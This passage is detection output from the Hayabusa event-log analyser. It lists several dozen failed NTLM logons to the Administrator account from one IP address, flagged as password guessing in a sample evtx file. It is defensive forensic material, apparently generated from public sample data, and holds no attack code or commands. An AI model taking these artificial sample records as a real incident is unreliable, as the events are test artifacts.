10612016-09-20 01:50:07.663 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10622016-09-20 01:50:07.684 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10632016-09-20 01:50:07.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10642016-09-20 01:50:07.752 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10652016-09-20 01:50:07.796 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10662016-09-20 01:50:07.835 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10672016-09-20 01:50:07.929 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10682016-09-20 01:50:07.972 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10692016-09-20 01:50:08.000 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Unknown ReasonUser: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10702016-09-20 01:50:08.042 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Unknown ReasonUser: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10712016-09-20 01:50:08.179 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10722016-09-20 01:50:08.219 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10732016-09-20 01:50:08.335 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10742016-09-20 01:50:08.397 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10752016-09-20 01:50:08.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10762016-09-20 01:50:08.513 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10772016-09-20 01:50:08.545 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10782016-09-20 01:50:08.576 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10792016-09-20 01:50:08.611 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10802016-09-20 01:50:08.646 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10812016-09-20 01:50:08.693 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10822016-09-20 01:50:08.735 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10832016-09-20 01:50:08.769 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10842016-09-20 01:50:08.804 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10852016-09-20 01:50:08.839 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10862016-09-20 01:50:08.883 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10872016-09-20 01:50:08.916 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10882016-09-20 01:50:08.955 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10892016-09-20 01:50:08.992 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10902016-09-20 01:50:09.028 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10912016-09-20 01:50:09.071 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10922016-09-20 01:50:09.108 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10932016-09-20 01:50:09.144 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10942016-09-20 01:50:09.183 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10952016-09-20 01:50:09.219 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10962016-09-20 01:50:09.255 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10972016-09-20 01:50:09.291 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10982016-09-20 01:50:09.336 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10992016-09-20 01:50:09.364 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11002016-09-20 01:50:09.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11012016-09-20 01:50:09.455 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11022016-09-20 01:50:09.500 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11032016-09-20 01:50:09.544 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11042016-09-20 01:50:09.587 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11052016-09-20 01:50:09.631 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11062016-09-20 01:50:09.686 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11072016-09-20 01:50:09.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11082016-09-20 01:50:09.760 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11092016-09-20 01:50:09.797 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11102016-09-20 01:50:09.840 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11112016-09-20 01:50:09.876 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11122016-09-20 01:50:09.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11132016-09-20 01:50:09.968 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11142016-09-20 01:50:10.016 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11152016-09-20 01:50:10.061 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11162016-09-20 01:50:10.156 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11172016-09-20 01:50:10.191 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11182016-09-20 01:50:10.222 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11192016-09-20 01:50:10.263 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11202016-09-20 01:50:10.311 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11212016-09-20 01:50:10.344 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11222016-09-20 01:50:10.383 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11232016-09-20 01:50:10.423 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11242016-09-20 01:50:10.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11252016-09-20 01:50:10.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11262016-09-20 01:50:10.547 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11272016-09-20 01:50:10.580 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11282016-09-20 01:50:10.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11292016-09-20 01:50:10.659 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11302016-09-20 01:50:10.699 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11312016-09-20 01:50:10.738 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11322016-09-20 01:50:10.776 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11332016-09-20 01:50:10.820 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11342016-09-20 01:50:10.869 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11352016-09-20 01:50:10.917 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
